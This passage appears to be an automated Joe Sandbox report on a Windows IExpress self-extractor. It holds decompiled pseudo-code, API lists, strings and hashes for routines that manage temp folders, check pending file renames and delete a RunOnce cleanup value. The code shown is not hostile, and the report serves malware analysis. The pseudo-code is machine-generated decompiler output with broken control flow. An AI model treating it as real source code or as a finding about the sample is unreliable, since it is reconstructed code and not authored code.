0x00eb542b
0x00eb5434
0x00eb5434
0x00eb543a
0x00eb544c
0x00eb544c
0x00eb5452
0x00eb545a
0x00000000
0x00000000
0x00eb545e
0x00eb545f
0x00000000

APIs

Part of subcall function 00EB171E: _vsnprintf.MSVCRT ref: 00EB1750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB53FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5452

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB53B7, 00EB53E1, 00EB541E
IXP, xrefs: 00EB5419
IXP%03d.TMP, xrefs: 00EB53C0

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-2562829823
Opcode ID: bcddbd4bf40849fb5202cdf929171f45ea7e74861a7956e3c62858bdebefe371
Instruction ID: 8a88109b22ce892d0537c289f0939dd4dbf77c3f6fc196b48ab3c80267c9f5ea
Opcode Fuzzy Hash: bcddbd4bf40849fb5202cdf929171f45ea7e74861a7956e3c62858bdebefe371
Instruction Fuzzy Hash: EF1104727006046BD720AB279C49FEF76ADEBC1321F441275F656F2290DE74894A86A1

Uniqueness

Uniqueness Score: -1.00%

Function 00EB256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00EB256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E00EB24E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00eb2572
0x00eb2573
0x00eb2575
0x00eb2578
0x00eb257d
0x00eb2627
0x00eb2583
0x00eb2586
0x00eb2589
0x00eb25eb
0x00eb2607
0x00000000
0x00eb2609
0x00eb261a
0x00000000
0x00eb261a
0x00000000
0x00eb258b
0x00eb258b
0x00eb259e
0x00eb25b2
0x00eb25ba
0x00eb25cb
0x00eb25d1
0x00eb25d6
0x00eb25da
0x00eb25dd
0x00eb25dd
0x00eb25e3
0x00eb25e3
0x00eb25e3
0x00eb258b
0x00eb2589
0x00eb262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00EB4096,00EB4096,?,00EB1ED3,00000001,00000000,?,?,00EB4137,?), ref: 00EB25B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00EB4096,?,00EB1ED3,00000001,00000000,?,?,00EB4137,?,00EB4096), ref: 00EB25CB
RegCloseKey.KERNELBASE(?,?,00EB1ED3,00000001,00000000,?,?,00EB4137,?,00EB4096), ref: 00EB25DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00EB4096,00EB4096,?,00EB1ED3,00000001,00000000,?,?,00EB4137,?), ref: 00EB25FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00EB4096,00000000,00000000,00000000,00000000,?,00EB1ED3,00000001,00000000), ref: 00EB261A

Strings

System\CurrentControlSet\Control\Session Manager, xrefs: 00EB25A8
PendingFileRenameOperations, xrefs: 00EB25C3
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00EB25F5

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: dd65d7379e5b42857675342159534e9d273bfa4299b38e6ee370a04052df8e2a
Instruction ID: 103b815854ee9f3b007a693cd382e224609cc41f4e5076de0d8defb0d9e24c20
Opcode Fuzzy Hash: dd65d7379e5b42857675342159534e9d273bfa4299b38e6ee370a04052df8e2a
Instruction Fuzzy Hash: 1E118F35902228BFDF30AB929C09DFBBFBCEF057A5F1451A9B908B2100D6304E48D6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00EB6A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				L00EB7155();
				_push(0x58);
				_push(0xeb72b8);
				E00EB7208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0xeb88b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0xeb88b0; // 0x2
						if(__eflags != 0) {
							 *0xeb81e4 = _t58;
							goto L13;
						} else {
							 *0xeb88b0 = _t58;
							_t37 = E00EB6C3F(0xeb10b8, 0xeb10c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00EB6FF4();
						L13:
						_t68 =  *0xeb88b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0xeb10b4);
							_push(0xeb10ac);
							L00EB7202();
							 *0xeb88b0 = 2;
						}
						if(_t53 == 0) {
							 *0xeb88ac = 0;
						}
						_t71 =  *0xeb88b4;
						if( *0xeb88b4 != 0 && E00EB7060(_t71, 0xeb88b4) != 0) {
							_t60 =  *0xeb88b4; // 0x0
							 *0xeba288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x777d5b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00EB2BFB(0xeb0000, 0, _t59); // executed
							 *0xeb81e0 = _t30;
							__eflags =  *0xeb81f8;
							if( *0xeb81f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0xeb81e4;
							if( *0xeb81e4 == 0) {
								__imp___cexit();
								_t30 =  *0xeb81e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E00EB724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00eb6a60
0x00eb6a6a
0x00eb6a6c
0x00eb6a71
0x00eb6a78
0x00eb6a7f
0x00eb6a85
0x00eb6a8e
0x00eb6a91
0x00eb6a93
0x00eb6a9c
0x00eb6aa2
0x00000000
0x00000000
0x00eb6aa6
0x00eb6ab4
0x00000000
0x00eb6aa8
0x00eb6aaa
0x00eb6aab
0x00eb6aab
0x00eb6abf
0x00eb6abf
0x00eb6ac5
0x00eb6ad1
0x00eb6ad7
0x00eb6b05
0x00000000
0x00eb6ad9
0x00eb6ad9
0x00eb6ae9
0x00eb6af0
0x00eb6af2
0x00000000
0x00eb6af4
0x00eb6af4
0x00eb6afb
0x00eb6afb
0x00eb6af2
0x00eb6ac7
0x00eb6ac7
0x00eb6ac9
0x00eb6b0b
0x00eb6b0b
0x00eb6b11
0x00eb6b13
0x00eb6b18
0x00eb6b1d
0x00eb6b24
0x00eb6b24
0x00eb6b30
0x00eb6b39
0x00eb6b39
0x00eb6b3b
0x00eb6b42
0x00eb6b57
0x00eb6b5f
0x00eb6b65
0x00eb6b65
0x00eb6b67
0x00eb6b6c
0x00eb6b6e
0x00eb6b71
0x00eb6b74
0x00eb6b74
0x00eb6b79
0x00000000
0x00000000
0x00eb6b7d
0x00eb6b81
0x00000000
0x00000000
0x00eb6b83
0x00eb6b8c
0x00eb6b8d
0x00eb6b90
0x00eb6b90
0x00eb6b83
0x00eb6b81
0x00eb6b94
0x00eb6b98
0x00eb6ba2
0x00eb6b9a
0x00eb6b9a
0x00eb6b9a
0x00eb6ba3
0x00eb6bab
0x00eb6bb0
0x00eb6bb5
0x00eb6bbc
0x00eb6bbf
0x00000000
0x00eb6bbf
0x00eb6c1e
0x00eb6c25
0x00eb6c27
0x00eb6c2d
0x00eb6c2d
0x00eb6c32
0x00000000
0x00eb6bc5
0x00eb6bc5
0x00eb6bc8
0x00eb6bcc
0x00eb6bce
0x00eb6bce
0x00eb6bd1
0x00eb6bd3
0x00eb6bd3
0x00eb6bd6
0x00eb6bda
0x00eb6be1
0x00eb6be3
0x00eb6be5
0x00eb6be5
0x00eb6be6
0x00eb6be6
0x00eb6be9
0x00eb6bea
0x00eb6bea
0x00eb6b74
0x00eb6c39
0x00eb6c3e
0x00eb6c3e
0x00eb6abe
0x00eb6abe
0x00000000

APIs

GetStartupInfoW.KERNEL32(?,00EB72B8,00000058), ref: 00EB6A7F
Sleep.KERNEL32(000003E8), ref: 00EB6AB4
_amsg_exit.MSVCRT ref: 00EB6AC9
_initterm.MSVCRT ref: 00EB6B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00EB6B49
exit.KERNELBASE ref: 00EB6BBF
_ismbblead.MSVCRT ref: 00EB6BDA

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 359039474-0
Opcode ID: 0e904233706104c13e879da312fd78e87e402432b3b287eabcd7d71ab410f7c2
Instruction ID: b6b02fa0c82e62cbd3002bd16c1f1482bb10f07d00e1603b8d68056e71f36bac
Opcode Fuzzy Hash: 0e904233706104c13e879da312fd78e87e402432b3b287eabcd7d71ab410f7c2
Instruction Fuzzy Hash: EF4104719043258FDF25AB69D9957EB7BF8EB84724F54222AE841F32A0CF784C44CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00EB58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00EB58C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00EB1680(_t20, _t36, _t33);
					E00EB658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0xeb9124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E00EB44B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0xeb9124 = E00EB6285();
					_t14 = 0;
				}
				return _t14;
			}

0x00eb58cd
0x00eb58d1
0x00eb58d3
0x00eb58d5
0x00eb58d8
0x00eb58d8
0x00eb58da
0x00eb58db
0x00eb58e1
0x00eb58ed
0x00eb58f1
0x00eb591e
0x00eb592c
0x00eb5943
0x00eb594a
0x00eb594d
0x00eb5953
0x00eb5959
0x00000000
0x00eb595b
0x00eb595c
0x00eb5963
0x00eb596c
0x00000000
0x00eb5972
0x00eb5974
0x00eb597a
0x00eb597a
0x00eb596c
0x00eb58f3
0x00eb5901
0x00eb5906
0x00eb590b
0x00eb5910
0x00eb5910
0x00eb5918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00EB5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB58E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00EB5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5943
LocalFree.KERNEL32(00000000,?,00EB5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB594D
CloseHandle.KERNEL32(00000000,?,00EB5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00EB5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5963

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB58CD, 00EB58CF, 00EB5919, 00EB5962
TMP4351$.TMP, xrefs: 00EB5923

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
API String ID: 747627703-1330067808
Opcode ID: 11e4ddbbb0950eaed4809de8fa5957d342d824e86f53859e13c5f3e607aeba01
Instruction ID: 914cf858b49359e60bd66027aa2c8f5ef342d32ee3ba93da85d453d452e27b57
Opcode Fuzzy Hash: 11e4ddbbb0950eaed4809de8fa5957d342d824e86f53859e13c5f3e607aeba01
Instruction Fuzzy Hash: 4D1122726012117BCB242F7AAC0DBDB7E9DDF86374F141725F61AF31D1DA70880A86A0

Uniqueness

Uniqueness Score: -1.00%

Function 00EB51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00EB51E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E00EB468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E00EB468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E00EB44B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0xeb9124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0xeb9124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E00EB44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0xeb9124 = 0x80070714;
					goto L10;
				}
				E00EB44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xeb9124 = E00EB6285();
				goto L10;
			}

0x00eb51fb
0x00eb5207
0x00eb520b
0x00eb523c
0x00eb5268
0x00eb5270
0x00eb528b
0x00eb5293
0x00eb529c
0x00eb52a6
0x00eb52b0
0x00000000
0x00eb52b0
0x00eb529e
0x00eb5279
0x00000000
0x00eb527b
0x00eb5273
0x00000000
0x00eb5273
0x00eb524a
0x00eb5250
0x00eb5256
0x00000000
0x00eb5256
0x00eb5219
0x00eb5223
0x00000000

APIs

Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00EB2F4D,?,00000002,00000000), ref: 00EB5201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00EB5250

Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554

Part of subcall function 00EB6285: GetLastError.KERNEL32(00EB5BBC), ref: 00EB6285

Strings

UPROMPT, xrefs: 00EB51EF, 00EB5230
<None>, xrefs: 00EB5262

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: b763c9895448a76c74be6c48858895b890aca62b9e7f7ac962d669a2a7d6a20b
Instruction ID: 901aa2fbfbe99122b42972e57893ea0e4e2f1c3c0d01d2ba8b49f0dace6bdfc7
Opcode Fuzzy Hash: b763c9895448a76c74be6c48858895b890aca62b9e7f7ac962d669a2a7d6a20b
Instruction Fuzzy Hash: 3C1126B22022016FE7156B765C46FBB31EDDBC8350F015139F702F11E1DA788C011124

Uniqueness

Uniqueness Score: -1.00%

Function 00EB52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00EB52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0xeb8004; // 0x92ae1240
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0xeb91e0; // 0xd582b0
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0xeb8a24 == 0 &&  *0xeb9a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0xeb8a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0xeb8a24 == 0 &&  *0xeb9a30 == 0) {
					_push(_t22);
					E00EB1781( &_v268, 0x104, _t22, "C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
					if(( *0xeb9a34 & 0x00000020) != 0) {
						E00EB65E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00EB2390( &_v268);
					_t11 =  *0xeb8a20; // 0x0
				}
				if( *0xeb9a40 != 1 && _t11 != 0) {
					_t11 = E00EB1FE1(_t22); // executed
				}
				 *0xeb8a20 =  *0xeb8a20 & 0x00000000;
				return E00EB6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x00eb52b6
0x00eb52b6
0x00eb52b6
0x00eb52c1
0x00eb52c8
0x00eb52cb
0x00eb52cc
0x00eb52d4
0x00eb52d6
0x00eb52d7
0x00eb52de
0x00eb52e0
0x00eb52f2
0x00eb52fa
0x00eb52fa
0x00eb5302
0x00eb5305
0x00eb530c
0x00eb5312
0x00eb5316
0x00eb5316
0x00eb5317
0x00eb531c
0x00eb531f
0x00eb5333
0x00eb5345
0x00eb5351
0x00eb5359
0x00eb5359
0x00eb5363
0x00eb5369
0x00eb536f
0x00eb5374
0x00eb5374
0x00eb5381
0x00eb5387
0x00eb5387
0x00eb538f
0x00eb53a0

APIs

SetFileAttributesA.KERNELBASE(00D582B0,00000080,?,00000000), ref: 00EB52F2
DeleteFileA.KERNELBASE(00D582B0), ref: 00EB52FA
LocalFree.KERNEL32(00D582B0,?,00000000), ref: 00EB5305
LocalFree.KERNEL32(00D582B0), ref: 00EB530C
SetCurrentDirectoryA.KERNELBASE(00EB11FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00EB5363

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB5334

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 2833751637-388467436
Opcode ID: 4341b41035c7c0f807e6ae21e34015e9d52fa79f9606ca2276f1d87a38424b81
Instruction ID: 5453ae3ad3de13665093d9d8f9fe539499cccb33202d2c57e3d86df2b077d7dd
Opcode Fuzzy Hash: 4341b41035c7c0f807e6ae21e34015e9d52fa79f9606ca2276f1d87a38424b81
Instruction Fuzzy Hash: B921C232501604DFDB25AF25ED19BEB77E8EB00354F081269E542723A5CFB45C88CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00EB1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB1FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0xeb8530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00eb1fee
0x00eb2005
0x00eb200d
0x00eb2017
0x00000000
0x00eb2020
0x00eb200d
0x00eb2029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00EB538C,?,?,00EB538C), ref: 00EB2005
RegDeleteValueA.KERNELBASE(00EB538C,wextract_cleanup0,?,?,00EB538C), ref: 00EB2017
RegCloseKey.ADVAPI32(00EB538C,?,?,00EB538C), ref: 00EB2020

Strings

wextract_cleanup0, xrefs: 00EB1FE7, 00EB200F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00EB1FFB

Memory Dump Source

